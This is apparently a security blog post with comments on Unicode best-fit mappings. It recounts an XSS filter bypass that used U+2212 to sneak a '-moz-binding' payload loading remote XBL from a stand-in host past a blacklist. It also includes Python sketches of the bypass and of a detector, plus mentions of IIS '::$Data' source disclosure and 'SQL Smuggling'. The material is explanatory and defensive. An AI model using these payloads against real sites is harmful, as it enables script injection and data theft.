Unicode security attacks and test cases – Best-fit mappings and String transformations

Best-fit mappings are another complex topic in Unicode, easily overlooked or misunderstood. On the defensive side, if you can remember only two things, remember these:

  1. Converting to Unicode is safe.

  2. Converting between legacy character sets is dangerous.

Ah, forget it. Unfortunately it’s more complicated than that, because basic string handling can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.

The term best-fit mapping describes how a character gets represented when the destination character set has no exact equivalent for it: the converter substitutes a character that looks or means something similar.
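To make the idea concrete, here is a minimal Python sketch of a converter with best-fit fallback. Python's built-in codecs do not do best-fit substitution on their own, so the `BEST_FIT` table and the `best_fit_encode` helper are hypothetical, hand-written for illustration; real converters ship much larger, vendor-specific tables.

```python
# Hypothetical best-fit table: a tiny hand-picked subset for illustration only.
BEST_FIT = {
    "\u2212": "-",   # MINUS SIGN -> HYPHEN-MINUS
    "\uff1c": "<",   # FULLWIDTH LESS-THAN SIGN -> LESS-THAN SIGN
    "\u02b9": "'",   # MODIFIER LETTER PRIME -> APOSTROPHE
}


def best_fit_encode(text, charset="ascii"):
    """Encode text, substituting a look-alike when a character has no slot."""
    out = bytearray()
    for ch in text:
        try:
            out += ch.encode(charset)
        except UnicodeEncodeError:
            # No exact slot in the destination charset: fall back to the
            # best-fit substitute, or to "?" if the table has no entry.
            out += BEST_FIT.get(ch, "?").encode(charset)
    return bytes(out)


print(best_fit_encode("\u2212moz"))   # the MINUS SIGN silently becomes "-"
```

The point to notice is that the substitution is silent: the caller gets back ordinary ASCII bytes with no sign that a different character went in.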

I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They had just implemented a new profile editor complete with user-controlled CSS. They were smart, though: they knew that stuff like this would lead to XSS:

-moz-binding: url(http://nottrusted.com/gotcha.xml#xss)

So they implemented some sort of blacklist, because, well, that’s common. Anyway, somewhere in the call stack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out that I could supply a character that would pass through their filter and come out transformed into the character I needed. The input:

−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)

The first character here is U+2212 MINUS SIGN (−), which was being transformed through an apparent best-fit mapping into U+002D HYPHEN-MINUS (-).
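The order of operations is what makes this work, and a short Python sketch shows it. Everything here is an assumption made for illustration: the `BLOCKED` list, `passes_filter`, and `later_transform` are hypothetical stand-ins, not the application's actual code, and the transform is reduced to the single U+2212 to U+002D substitution described above.

```python
# Hypothetical blacklist of dangerous CSS tokens (illustrative only).
BLOCKED = ["-moz-binding", "expression(", "javascript:"]


def passes_filter(css):
    """Naive blacklist check: True when no blocked token is present."""
    lowered = css.lower()
    return not any(token in lowered for token in BLOCKED)


def later_transform(css):
    """Stand-in for a best-fit conversion that happens after filtering."""
    return css.replace("\u2212", "-")  # MINUS SIGN -> HYPHEN-MINUS


payload = "\u2212moz\u2212binding: url(http://nottrusted.com/gotcha.xml#xss)"

# Filter first, transform second: the payload slips through the check
# and only becomes dangerous afterwards.
print(passes_filter(payload))
print(later_transform(payload))

# Transform first, filter second: the same check now catches it.
print(passes_filter(later_transform(payload)))
```

The general lesson under these assumptions is to validate the string in the form it will finally be used in, after every conversion has already happened.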

The Watcher security testing tool I released a few months ago has a new check coming to detect string transformations like this. My plan was to detect spots where strings can be manipulated to pull off attacks like I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?
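As a rough idea of what such a check might look like, here is a small Python sketch. It is not Watcher's code; `PROBES`, `find_transformations`, and the `round_trip` callable (a stand-in for "send a value to the application and read back what it echoes") are all hypothetical names chosen for this example.

```python
# Characters that some converters are known to fold into ASCII look-alikes.
PROBES = ["\u2212", "\uff1c", "\uff07", "\u02b9"]


def find_transformations(round_trip, probes=PROBES):
    """Return (sent, received) pairs for probes that came back changed.

    round_trip is any callable that takes the submitted string and returns
    the text the application echoes back (for example, a response body).
    """
    findings = []
    for ch in probes:
        marker = "zq" + ch + "qz"        # unlikely delimiters around the probe
        echoed = round_trip(marker)
        if marker in echoed:
            continue                     # probe survived unchanged
        start = echoed.find("zq")
        end = echoed.find("qz", start + 2) if start != -1 else -1
        if end != -1:
            findings.append((ch, echoed[start + 2:end]))
    return findings


def fake_app(value):
    """Toy application that folds MINUS SIGN into HYPHEN-MINUS."""
    return "<p>" + value.replace("\u2212", "-") + "</p>"


for sent, received in find_transformations(fake_app):
    print("U+%04X came back as %r" % (ord(sent), received))
```

Any probe that comes back as a different character marks a spot worth a closer look, since a filter placed before that transformation can probably be bypassed.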

I really like to test new versions of IIS + .Net to see if I can bypass some protections by using Unicode characters. Maybe we can reopen very old vulnerabilities such as file.asp::$Data, which shows the source of the file.


Belatedly... a couple of years ago I spoke at the RSA Conference and OWASP about some research I did using best-fit mappings to bypass input validation, stored procedure bindings, etc., and mount SQL injection attacks. Because of the architectural aspect, I labeled this sub-class "SQL Smuggling". Details are posted at http://www.securityfocus.com/archive/1/496165/30/0/threaded.

Thanks for sharing, Avi. I started a testing guide to capture more of this information but set it aside, as time is too limited these days. If you're interested in looking at it, let me know. One goal I had was to inventory common database connection drivers that display the type of behavior you labeled 'SQL Smuggling'. The phenomenon is common across technologies, as you're aware, but focusing on the database drivers would help people tune them accordingly.